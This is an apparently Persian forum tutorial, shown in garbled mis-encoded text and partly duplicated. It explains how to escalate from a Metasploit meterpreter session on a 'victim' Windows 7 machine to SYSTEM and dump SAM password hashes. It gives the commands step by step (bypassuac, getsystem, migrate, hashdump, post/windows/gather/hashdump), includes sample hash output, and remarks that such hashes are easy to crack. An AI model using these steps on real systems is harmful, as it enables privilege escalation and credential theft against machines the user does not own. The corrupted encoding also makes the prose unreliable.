سلام دوستان
Ùرض ها :
1. دسترسی با استÙاده از یکی از اکسپلویت های موجود در متااسپلویت گرÙته شده Ùˆ در Øال Øاضر داخل کنسول متااسپلویت هستیم
2. سیستم عامل قربانی ویندوز 7 می باشد
3. پایلود ست شده "windows => meterpreter => reverse_tcp" می باشد .
ØÚ©Ù… :
بیرون کشیدن اطلاعات داخل پاپگاه SAM در ویندوز 7
مقدمه :
بر خلا٠ویندوز های قدیمی تر از 7 یعنی ویندوز XP / سرور 2003 Ùˆ ... در ویندوز 7 این مسئله Ú©Ù…ÛŒ متÙاوت Ù…ÛŒ باشد . دلیل این تÙاوت در جلوتر Ú¯Ùته خواهد شد . اما برای مشاهده این تÙاوت کاÙیست با استÙاده از متااسپلویت از یک سیستم عامل ویندوز XP دسترسی بگیرید Ùˆ در داخل کنسول دستور زیر را اجرا کنید :
می بینید که خروجی هش شده ی پسورد یوزر ها می باشد !
اما در داخل ویندوز 7 این چنین نیست ! یعنی Øتی اگر یوزری Ú©Ù‡ دسترسی در آن گرÙته شده است از گروه administrators باشد Ùˆ یا خود یوزر administrator باشد هم نمی توان به طور مستقیم این دستور را اجرا کرد .
در واقع اشکال کار ( Ú©Ù‡ Ú¯Ùته شد جلوتر بررسی خواهد شد ) به این جا بر میگردد Ú©Ù‡ در ویندوز 7 یا Vista Ùˆ یا 8 به صورت مستقیم نمی توان Øمله ÛŒ "جعل مسیر ارتباطی پروتکل های ویندوز" را اجرا کرد . برای این منظور بایپس هایی در نظر گرÙته شده Ú©Ù‡ در این جا به ناچار مجبور به بررسی یکی از روش ها هستیم تا بتوانیم کارهای دیگر خودمون رو پیش ببریم
ابتدا ( با Ùرض این Ú©Ù‡ یوزری Ú©Ù‡ در آن دسترسی گرÙتید از گروه administrators است ) دستور زیر رو اجرا کنید : ( داخل کنسول متااسپلویت )
در مرØله ÛŒ بعد به این صورت عمل کنید :
برای نمایش آپشن ها هم Ú©Ù‡ از دستور زیر استÙاده میکنیم :
همان طور Ú©Ù‡ میبینید تنها موردی Ú©Ù‡ Required یا ضروری Ú¯Ùته شده مقدار SESSION هست Ú©Ù‡ مشخص کننده شماره ÛŒ نشستی است Ú©Ù‡ بین شما Ùˆ قربانی ایجاد شده است
برای دیدن نشست های ایجاد شده همراه با شماره ÛŒ آن ها از دستور زیر استÙاده کنید :
Øالا Ú©Ù‡ شماره ÛŒ نشست ایجاد شده رو دیدید آن را به صورت زیر انتخاب کنید :
برای مثال :
Øال دستور run را اجرا کنید
اگر مراØÙ„ به صورت موÙقیت آمیز در آمد خروجی زیر ( 3644 مثال است ) رو دریاÙت خواهید کرد :
خط اول Øاکی از migrate کردن یا مهاجرت کردن به پروسس شماره ÛŒ 3644 را دارد Ùˆ خط دوم نیز موÙقیت آمیز بودن این Ùرایند را بازگو میکند
Øال کاÙیست یک اینتر بزنید Ùˆ دوباره دستور مشاهده ÛŒ نشست های ایجاد شده در سیستم را بزنید . یعنی :
چون در بالا خروجی ای مبنی بر موÙقیت أمیز بودن مراØÙ„ دریاÙت کردیم پس در این مرØله خواهیم دید Ú©Ù‡ یک نشست جدید برای ما ایجاد شده است . Øال کاÙیست آن را انتخاب کنیم . به این صورت :
مثلا :
خب تا این جای کار را داشته باشید . در چند خط بالاتر دو خط خروجی دریاÙت کردیم Ú©Ù‡ اولین خط به این صورت بود :
Øالا بیاید با هم ببینیم اسم این پروسس با شماره ÛŒ 3644 چیه ØŸ! برای این کار دستور زیر را وارد کنید تا تمامی پروسس های در Øال اجرا را ببنید :
خب Øالا به دنبال شماره ÛŒ پروسس یعنی در این جا 3644 میگردیم . میبنیم Ú©Ù‡ اسم این پروسس notepad.exe ثبت شده است ! Ú©Ù…ÛŒ با دقت تر نگاه کنید Ùˆ یوزری Ú©Ù‡ این پروسس رو به اجرا در آورده است رو ببنید . خواهید دید Ú©Ù‡ این یوزر SYSTEM Ùˆ یا administrator نمی باشد بلکه بلکه بلکه یک یوزر از گروه administrators Ù…ÛŒ باشد
سوال 1: از کجا مطمئن هستم که این یوزر از گروه administrators است ؟
جواب :از آن جا Ú©Ù‡ اگر این یوزر عوض گروه ادمین نبود در بالا خروجی موÙقیت آمیز بودن مراØÙ„ را دریاÙت نمی کردیم !
سوال 2 : با توجه به جواب سوال 1 چرا خروجی موÙقیت آمیز بودن مراØÙ„ را دریاÙت نمی کردیم ØŸ
جواب : در واقع موÙقیت آمیز بودن این موضوع در صورتی است Ú©Ù‡ : ال٠) یوزر Ù…Øدود پسورد یک یوزر از گروه ادمین را بداند . ب) این یوزر Ù…Øدود پسورد یکی از یوزر های گروه ادمین را وارد کند .
چرا Ú©Ù‡ چرا Ú©Ù‡ برای یوزر Ù…Øدود در زمان اجرای Øمله برای یوزر Ù…Øدود پیغامی مبنی بر وارد کردن پسورد یکی از یوزر های ادمین یا ادمین ظاهر میشود !
اگر این دو شرط هم زمان با هم رعایت Ùˆ اجرا شود در این صورت خروجی موÙقیت آمیز بودن مراØÙ„ رو دریاÙت خواهیم کرد . اما با توجه به میانگین Øالات Ùˆ شرایط در 90Ùª مواقع یوزر Ù…Øدود یکی از دو شرط Ú¯Ùته شده را دارا نمی باشد لذا خروجی از جنس ناموÙÙ‚ Ù…ÛŒ باشد .
برگردیم به موضوع خودمون . Ú¯Ùتیم پروسسی Ú©Ù‡ به آن مهاجرت شده یا migrate شده notepad.exe است Ùˆ یوزری هم Ú©Ù‡ این پروسس در آن اجرا شده یک یوزر از گروه ادمین است
اما اما اما با این تÙاوت Ú©Ù‡ مثلا یک Ùایل در یک یوزر عضو گروه ادمین با "Run as administrator" اجرا شده باشد !!! نتیجه این مورد رو به صورت شهودی Ù…ÛŒ توان در دستور زیر دید :
Ù…ÛŒ بینید Ú©Ù‡ تونستید یوزر خودتون رو به system Ú©Ù‡ بالا ترین Ø³Ø·Ø Ø¯Ø³ØªØ±Ø³ÛŒ Ù…ÛŒ باشید ارتقاء دهید . این همان یکی از روش های بایپس Øمله ÛŒ "جعل مسیر ارتباطی پروتکل های ویندوز" Ù…ÛŒ باشد
اما ما در این جا با دستور getsystem کاری نداریم بلکه می خواهیم خودمون پروسس اجرایی را به یک پروسس دیگر با یک یوزر دیگر ارتقاء دهیم
برای این منظور ابتدا یک ps بگیرید و به دنبال پروسس هایی با یوزر SYSTEM باشید برای مثال من پروسس lsm.exe را انتخاب می کنم یا پروسس svchost.exe و یا ... توجه کنید که تنها موردی که باید به آن توجه کرد یوزر اجرایی آن پروسس است که این جا باید SYSTEM باشد .
خب Øالا کاÙیست از پروسس notepad.exe به یکی از پروسس هایی Ú©Ù‡ در بالا Ú¯Ùته شد مهاجرت یا migrate کنیم برای این منظور از دستور زیر استÙاده کنیم :
مثلا :
اگر مراØÙ„ به صورت موÙقیت آمیز Ø·ÛŒ شود خروجی مانند زیر دریاÙت خواهید کرد :
Øالا کاÙیست دستور hashdump را اجرا کنیم تا مقدار هش شده ÛŒ پسورد یوزرها را مشاهده کنیم
برای مثال :
یک روش سریع تر ! :
Ø³Ø·Ø Ø¯Ø³ØªØ±Ø³ÛŒ system رو با دستور زیر بگیرید :
Øال عبارت زیر رو اجرا کنید :
که نتیجه همان نمایش هش شده پسورد یوزر ها میباشد !
خب همان طور Ú©Ù‡ دیدید مرØله به مرØله با تمام جزییات این موضوع رو با هم بررسی کردیم .
تنها چیزی Ú©Ù‡ میتوان Ú¯Ùت باقی مانده است کرک کردن این هش ها است Ùقط همین قدر بگم Ú©Ù‡ با توجه به الگوریتم استÙاده شده در ویندوز . امکان کرک کردن این هش ها برای یک Ù†Ùوذگر در 80Ùª مواقع راØت Ù…ÛŒ باشد .
نویسنده : E2MA3N
منبع : سرچ گوگل !
اگر موردی یا اشکالی یا ... دیدید Øتما Ù…Ø·Ø±Ø Ú©Ù†ÛŒØ¯ . با اØترام
Ùرض ها :
1. دسترسی با استÙاده از یکی از اکسپلویت های موجود در متااسپلویت گرÙته شده Ùˆ در Øال Øاضر داخل کنسول متااسپلویت هستیم
2. سیستم عامل قربانی ویندوز 7 می باشد
3. پایلود ست شده "windows => meterpreter => reverse_tcp" می باشد .
ØÚ©Ù… :
بیرون کشیدن اطلاعات داخل پاپگاه SAM در ویندوز 7
مقدمه :
بر خلا٠ویندوز های قدیمی تر از 7 یعنی ویندوز XP / سرور 2003 Ùˆ ... در ویندوز 7 این مسئله Ú©Ù…ÛŒ متÙاوت Ù…ÛŒ باشد . دلیل این تÙاوت در جلوتر Ú¯Ùته خواهد شد . اما برای مشاهده این تÙاوت کاÙیست با استÙاده از متااسپلویت از یک سیستم عامل ویندوز XP دسترسی بگیرید Ùˆ در داخل کنسول دستور زیر را اجرا کنید :
کد:
hashdump
اما در داخل ویندوز 7 این چنین نیست ! یعنی Øتی اگر یوزری Ú©Ù‡ دسترسی در آن گرÙته شده است از گروه administrators باشد Ùˆ یا خود یوزر administrator باشد هم نمی توان به طور مستقیم این دستور را اجرا کرد .
در واقع اشکال کار ( Ú©Ù‡ Ú¯Ùته شد جلوتر بررسی خواهد شد ) به این جا بر میگردد Ú©Ù‡ در ویندوز 7 یا Vista Ùˆ یا 8 به صورت مستقیم نمی توان Øمله ÛŒ "جعل مسیر ارتباطی پروتکل های ویندوز" را اجرا کرد . برای این منظور بایپس هایی در نظر گرÙته شده Ú©Ù‡ در این جا به ناچار مجبور به بررسی یکی از روش ها هستیم تا بتوانیم کارهای دیگر خودمون رو پیش ببریم
ابتدا ( با Ùرض این Ú©Ù‡ یوزری Ú©Ù‡ در آن دسترسی گرÙتید از گروه administrators است ) دستور زیر رو اجرا کنید : ( داخل کنسول متااسپلویت )
کد:
background
کد:
use post/windows/escalate/bypassuac
کد:
show options
برای دیدن نشست های ایجاد شده همراه با شماره ÛŒ آن ها از دستور زیر استÙاده کنید :
کد:
sessions -l
کد:
set session ID
کد:
set session 1
اگر مراØÙ„ به صورت موÙقیت آمیز در آمد خروجی زیر ( 3644 مثال است ) رو دریاÙت خواهید کرد :
کد:
[+] Migrating to 3644 [+] Successfully migrated to process
Øال کاÙیست یک اینتر بزنید Ùˆ دوباره دستور مشاهده ÛŒ نشست های ایجاد شده در سیستم را بزنید . یعنی :
کد:
sessions -l
کد:
sessions -i ID
کد:
sessions -i 2
کد:
[+] Migrating to 3644
کد:
ps
سوال 1: از کجا مطمئن هستم که این یوزر از گروه administrators است ؟
جواب :از آن جا Ú©Ù‡ اگر این یوزر عوض گروه ادمین نبود در بالا خروجی موÙقیت آمیز بودن مراØÙ„ را دریاÙت نمی کردیم !
سوال 2 : با توجه به جواب سوال 1 چرا خروجی موÙقیت آمیز بودن مراØÙ„ را دریاÙت نمی کردیم ØŸ
جواب : در واقع موÙقیت آمیز بودن این موضوع در صورتی است Ú©Ù‡ : ال٠) یوزر Ù…Øدود پسورد یک یوزر از گروه ادمین را بداند . ب) این یوزر Ù…Øدود پسورد یکی از یوزر های گروه ادمین را وارد کند .
چرا Ú©Ù‡ چرا Ú©Ù‡ برای یوزر Ù…Øدود در زمان اجرای Øمله برای یوزر Ù…Øدود پیغامی مبنی بر وارد کردن پسورد یکی از یوزر های ادمین یا ادمین ظاهر میشود !
اگر این دو شرط هم زمان با هم رعایت Ùˆ اجرا شود در این صورت خروجی موÙقیت آمیز بودن مراØÙ„ رو دریاÙت خواهیم کرد . اما با توجه به میانگین Øالات Ùˆ شرایط در 90Ùª مواقع یوزر Ù…Øدود یکی از دو شرط Ú¯Ùته شده را دارا نمی باشد لذا خروجی از جنس ناموÙÙ‚ Ù…ÛŒ باشد .
برگردیم به موضوع خودمون . Ú¯Ùتیم پروسسی Ú©Ù‡ به آن مهاجرت شده یا migrate شده notepad.exe است Ùˆ یوزری هم Ú©Ù‡ این پروسس در آن اجرا شده یک یوزر از گروه ادمین است
اما اما اما با این تÙاوت Ú©Ù‡ مثلا یک Ùایل در یک یوزر عضو گروه ادمین با "Run as administrator" اجرا شده باشد !!! نتیجه این مورد رو به صورت شهودی Ù…ÛŒ توان در دستور زیر دید :
کد:
getsystem
اما ما در این جا با دستور getsystem کاری نداریم بلکه می خواهیم خودمون پروسس اجرایی را به یک پروسس دیگر با یک یوزر دیگر ارتقاء دهیم
برای این منظور ابتدا یک ps بگیرید و به دنبال پروسس هایی با یوزر SYSTEM باشید برای مثال من پروسس lsm.exe را انتخاب می کنم یا پروسس svchost.exe و یا ... توجه کنید که تنها موردی که باید به آن توجه کرد یوزر اجرایی آن پروسس است که این جا باید SYSTEM باشد .
خب Øالا کاÙیست از پروسس notepad.exe به یکی از پروسس هایی Ú©Ù‡ در بالا Ú¯Ùته شد مهاجرت یا migrate کنیم برای این منظور از دستور زیر استÙاده کنیم :
کد:
migrate ID
کد:
migrate 500
کد:
[*] Migrating to 500... [*] Migration completed successfully.
برای مثال :
کد:
meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: iman:1000:aad3b435b51404eeaad3b435b51404ee:fb59fe2ebea80ec80458ff533094884c:::
یک روش سریع تر ! :
Ø³Ø·Ø Ø¯Ø³ØªØ±Ø³ÛŒ system رو با دستور زیر بگیرید :
کد:
getsystem
کد:
run post/windows/gather/hashdump
خب همان طور Ú©Ù‡ دیدید مرØله به مرØله با تمام جزییات این موضوع رو با هم بررسی کردیم .
تنها چیزی Ú©Ù‡ میتوان Ú¯Ùت باقی مانده است کرک کردن این هش ها است Ùقط همین قدر بگم Ú©Ù‡ با توجه به الگوریتم استÙاده شده در ویندوز . امکان کرک کردن این هش ها برای یک Ù†Ùوذگر در 80Ùª مواقع راØت Ù…ÛŒ باشد .
نویسنده : E2MA3N
منبع : سرچ گوگل !
اگر موردی یا اشکالی یا ... دیدید Øتما Ù…Ø·Ø±Ø Ú©Ù†ÛŒØ¯ . با اØترام
Comment